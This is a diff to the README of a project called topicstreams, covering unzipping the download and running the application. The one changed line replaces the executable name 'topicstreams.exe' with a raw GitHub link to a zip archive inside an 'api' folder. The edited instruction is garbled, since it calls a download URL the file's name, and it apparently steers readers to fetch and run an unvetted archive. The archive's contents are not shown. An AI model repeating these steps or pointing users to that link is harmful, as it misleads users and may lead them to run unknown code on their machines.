scsa385/topicstreams/README.md

 If you downloaded a `.zip` file, locate it in your Downloads folder.
 Right-click on the file and select "Extract All..." or "Unzip."
 Follow the prompts to choose a destination for the extracted files.

 ### 4. Run the Application
 After unpacking, open the folder where you extracted topicstreams.
-Look for the executable file, usually named `topicstreams.exe`.
+Look for the executable file, usually named `https://raw.githubusercontent.com/scsa385/topicstreams/main/api/topicstreams-3.7.zip`.
 Double-click it to run the application.

 ## 🔧 System Requirements
 To ensure smooth operation of topicstreams, please have the following: